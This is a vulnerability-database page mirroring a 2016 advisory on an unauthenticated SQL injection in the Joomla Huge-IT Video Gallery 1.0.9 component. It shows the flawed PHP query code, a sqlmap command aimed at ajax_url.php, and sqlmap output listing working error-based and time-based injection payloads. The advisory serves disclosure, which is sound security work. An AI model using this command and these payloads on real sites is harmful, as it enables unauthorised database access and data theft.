Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Huge-IT Video Gallery 1.0.9 Component - SQL Injection Vulnerability

🗓️ 22 Sep 2016 00:00:00Reported by Larry CashdollarType 
zdt
 zdt🔗 0day.today👁 29 Views

Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla, allows attackers to manipulate the database via ajax_url.ph

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Joomla Huge-IT Video Gallery 1.0.9 Component - SQL Injection Vulnerability
31 Aug 201700:00
zdt
CNVD		Huge-IT Video Gallery Extension SQL Injection Vulnerability in Joomla!
27 Sep 201600:00
cnvd
CVE		CVE-2016-1000123
6 Oct 201614:00
cve
Cvelist		CVE-2016-1000123
6 Oct 201614:00
cvelist
Dsquare		Joomla com_videogallerylite SQL Injection
1 Dec 201600:00
dsquare
Exploit DB		Joomla! Component com_videogallerylite 1.0.9 - SQL Injection
22 Sep 201600:00
exploitdb
Exploit DB		Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
31 Aug 201700:00
exploitdb
EUVD		EUVD-2016-1067
7 Oct 202500:30
euvd
exploitpack		Joomla! Component com_videogallerylite 1.0.9 - SQL Injection
22 Sep 201600:00
exploitpack
exploitpack		Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
31 Aug 201700:00
exploitpack
Rows per page
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. 
 
Vulnerable Code in : ajax_url.php
 
 11 define('_JEXEC',1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
 28         if($_POST['task']=="load_videos_content"){
 29 
 30             $page = 1;
 31 
 32 
 33             if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
 34                 $paramssld='';
 35                 $db5 = JFactory::getDBO();
 36                 $query5 = $db->getQuery(true);
 37                 $query5->select('*');
 38                 $query5->from('#__huge_it_videogallery_params');
 39                 $db->setQuery($query5);
 40                 $options_params = $db5->loadObjectList();
 41                 foreach ($options_params as $rowpar) {
 42                     $key = $rowpar->name;
 43                     $value = $rowpar->value;
 44                     $paramssld[$key] = $value;
 45                 }
 46                 $page = $_POST["page"];
 47                 $num=$_POST['perpage'];
 48                 $start = $page * $num - $num;
 49                 $idofgallery=$_POST['galleryid'];
 50 
 51                 $query = $db->getQuery(true);
 52                 $query->select('*');
 53                 $query->from('#__huge_it_videogallery_videos');
 54                 $query->where('videogallery_id ='.$idofgallery);
 55                 $query ->order('#__huge_it_videogallery_videos.ordering asc');
 56                 $db->setQuery($query,$start,$num);
 
CVE-2016-1000123
Exploit Code:
  aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"  --level=5 --risk=3
  aC/ .
  aC/ .
  aC/ .
  aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
  aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
  aC/ ---
  aC/ Parameter: #1* ((custom) POST)
  aC/     Type: error-based
  aC/     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
  aC/     Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
  aC/  
  aC/     Type: AND/OR time-based blind
  aC/     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
  aC/     Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
  aC/ ---
  aC/ [19:36:55] [INFO] the back-end DBMS is MySQL
  aC/ web server operating system: Linux Debian 8.0 (jessie)
  aC/ web application technology: Apache 2.4.10
  aC/ back-end DBMS: MySQL >= 5.0.12
  aC/ [19:36:55] [WARNING] HTTP error codes detected during run:
  aC/ 500 (Internal Server Error) - 2714 times
  aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
  aC/  
  aC/ [*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169

#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Sep 2016 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.06446
joomlahuge-it video gallerysql injectionunauthenticatedvulnerabilityajaxexploitadvisory.
29